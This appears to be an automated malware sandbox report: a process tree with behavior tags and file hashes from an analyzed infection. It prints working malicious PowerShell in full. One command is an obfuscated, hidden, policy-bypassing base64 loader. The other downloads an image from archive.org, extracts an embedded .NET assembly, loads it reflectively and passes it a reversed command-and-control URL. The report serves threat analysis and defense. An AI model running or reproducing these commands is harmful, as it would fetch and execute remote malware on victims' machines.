⺔HM⤖ ䷮ ⫗ ⫁ ⺔ZQ⤖ ䷮ ⫗ ⫁ ⺔2⤖ ䷮ ⫗ ⫁ ⺔DQ⤖ ䷮ ⫗ ⫁ ⺔QwBv⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔D0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔ZQBU⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔e⤖ ䷮ ⫗ ⫁ ⺔B0⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔UwB1⤖ ䷮ ⫗ ⫁ ⺔GI⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔aQBu⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔K⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BJ⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔Hg⤖ ䷮ ⫗ ⫁ ⺔L⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔YgBh⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔ZQ⤖ ䷮ ⫗ ⫁ ⺔2⤖ ䷮ ⫗ ⫁ ⺔DQ⤖ ䷮ ⫗ ⫁ ⺔T⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔ZwB0⤖ ䷮ ⫗ ⫁ ⺔Gg⤖ ䷮ ⫗ ⫁ ⺔KQ⤖ ䷮ ⫗ ⫁ ⺔7⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔YwBv⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔BC⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔WwBT⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔EM⤖ ䷮ ⫗ ⫁ ⺔bwBu⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔ZQBy⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔XQ⤖ ䷮ ⫗ ⫁ ⺔6⤖ ䷮ ⫗ ⫁ ⺔Do⤖ ䷮ ⫗ ⫁ ⺔RgBy⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔bQBC⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔cwBl⤖ ䷮ ⫗ ⫁ ⺔DY⤖ ䷮ ⫗ ⫁ ⺔N⤖ ䷮ ⫗ ⫁ ⺔BT⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔cgBp⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Zw⤖ ䷮ ⫗ ⫁ ⺔o⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔YgBh⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔ZQ⤖ ䷮ ⫗ ⫁ ⺔2⤖ ䷮ ⫗ ⫁ ⺔DQ⤖ ䷮ ⫗ ⫁ ⺔QwBv⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔p⤖ ䷮ ⫗ ⫁ ⺔Ds⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bs⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔YQBk⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔BB⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔cwBl⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YgBs⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔WwBT⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔FI⤖ ䷮ ⫗ ⫁ ⺔ZQBm⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔ZQBj⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔aQBv⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔LgBB⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔cwBl⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YgBs⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔XQ⤖ ䷮ ⫗ ⫁ ⺔6⤖ ䷮ ⫗ ⫁ ⺔Do⤖ ䷮ ⫗ ⫁ ⺔T⤖ ䷮ ⫗ ⫁ ⺔Bv⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔o⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔YwBv⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔BC⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔KQ⤖ ䷮ ⫗ ⫁ ⺔7⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔B5⤖ ䷮ ⫗ ⫁ ⺔H⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔ZQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔D0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔bwBh⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQBk⤖ ䷮ ⫗ ⫁ ⺔EE⤖ ䷮ ⫗ ⫁ ⺔cwBz⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQBi⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔eQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Ec⤖ ䷮ ⫗ ⫁ ⺔ZQB0⤖ ䷮ ⫗ ⫁ ⺔FQ⤖ ䷮ ⫗ ⫁ ⺔eQBw⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔K⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔n⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔bgBs⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔Yg⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Ek⤖ ䷮ ⫗ ⫁ ⺔Tw⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Eg⤖ ䷮ ⫗ ⫁ ⺔bwBt⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔p⤖ ䷮ ⫗ ⫁ ⺔Ds⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bt⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bo⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔D0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔eQBw⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔LgBH⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BN⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bo⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔o⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔VgBB⤖ ䷮ ⫗ ⫁ ⺔Ek⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔p⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔SQBu⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔bwBr⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔K⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔dQBs⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔L⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Fs⤖ ䷮ ⫗ ⫁ ⺔bwBi⤖ ䷮ ⫗ ⫁ ⺔Go⤖ ䷮ ⫗ ⫁ ⺔ZQBj⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔WwBd⤖ ䷮ ⫗ ⫁ ⺔F0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔o⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔B4⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔LgBD⤖ ䷮ ⫗ ⫁ ⺔EM⤖ ䷮ ⫗ ⫁ ⺔UgBW⤖ ䷮ ⫗ ⫁ ⺔FM⤖ ䷮ ⫗ ⫁ ⺔Lw⤖ ䷮ ⫗ ⫁ ⺔y⤖ ䷮ ⫗ ⫁ ⺔DE⤖ ䷮ ⫗ ⫁ ⺔MQ⤖ ䷮ ⫗ ⫁ ⺔v⤖ ䷮ ⫗ ⫁ ⺔DM⤖ ䷮ ⫗ ⫁ ⺔OQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔DQ⤖ ䷮ ⫗ ⫁ ⺔Ng⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Dc⤖ ䷮ ⫗ ⫁ ⺔OQ⤖ ䷮ ⫗ ⫁ ⺔x⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔Mg⤖ ䷮ ⫗ ⫁ ⺔4⤖ ䷮ ⫗ ⫁ ⺔C8⤖ ䷮ ⫗ ⫁ ⺔Lw⤖ ䷮ ⫗ ⫁ ⺔6⤖ ䷮ ⫗ ⫁ ⺔H⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔B0⤖ ䷮ ⫗ ⫁ ⺔Gg⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Cw⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔n⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQBz⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔YQBk⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Cw⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔n⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQBz⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔YQBk⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Cw⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔n⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQBz⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔YQBk⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔s⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔UgBl⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔QQBz⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔s⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔p⤖ ䷮ ⫗ ⫁ ⺔Ck⤖ ䷮ ⫗ ⫁ ⺔';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⤖ ䷮ ⫗ ⫁ ⺔','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CCRVS/211/39.46.791.28//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:660
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5fdd7c59c0bd94beaef58d495fd5ce0be
SHA177434b1f66263291d31f27e6d76d11756109fece
SHA256769db453ff1d784568be9e40e462c14b628e1c0ce10b21ec6ec685e3f9290c8b
SHA512ccf3f2a8b730906f93ff8b7ff4ed1d265c2167178a54e4154195081f8133c7848463900f0abefbba527cfce53f133e1e3bcd3ca1b4b19b3d7aa425b63f1a9923
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d2c0502295655b54e1463bf5bc077c58
SHA10d6705590c77866c13315fa5b737a0b0e373d378
SHA2563cb5767b3874176fef5cf7c6e7c83397a57d3d4877e88a587def5dffb04ebdbd
SHA5127093aa84afb7fcccd2555608bd2b9735c2879134bdbe020e6c9f355bcbc4e1456855f8ab888c84b4e6956c1d3087164a6400a7a7f9c4e752904cb6d17c694dc7
-
Filesize
177KB
MD5151ae78820d98d8873534bf1cdb53c8e
SHA150a463097f5bb500fcb65e4443243b38e836c61c
SHA2566949f04397e5341b1001fd30382b704065a7d1982c9bb07eb9308714bc416aab
SHA5123ea41997e5bcd53ea2518f56b2f01d81083b7d885e8cca76f9fde07799809ad2e2115c3056b005dd2211c82e6b29b88e15df0dfaa871746d574078a9c10d3bde